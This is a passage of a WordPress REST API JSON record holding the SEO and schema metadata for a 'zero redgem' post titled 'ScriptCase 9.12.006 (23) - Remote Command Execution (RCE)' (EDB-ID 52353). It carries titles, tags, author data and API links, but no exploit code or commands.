redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=7823","og_locale":"en_US","og_type":"article","og_title":"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE) Exploit ID EDB-ID:52353 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information...","og_url":"https:\/\/zero.redgem.net\/?p=7823","og_site_name":"zero redgem","article_published_time":"2025-07-08T13:35:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=7823#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=7823"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)","datePublished":"2025-07-08T13:35:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=7823"},"wordCount":987,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=7823#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=7823","url":"https:\/\/zero.redgem.net\/?p=7823","name":"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-08T13:35:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=7823#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=7823"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=7823#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7823","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7823"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7823\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7823"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7823"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7823"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}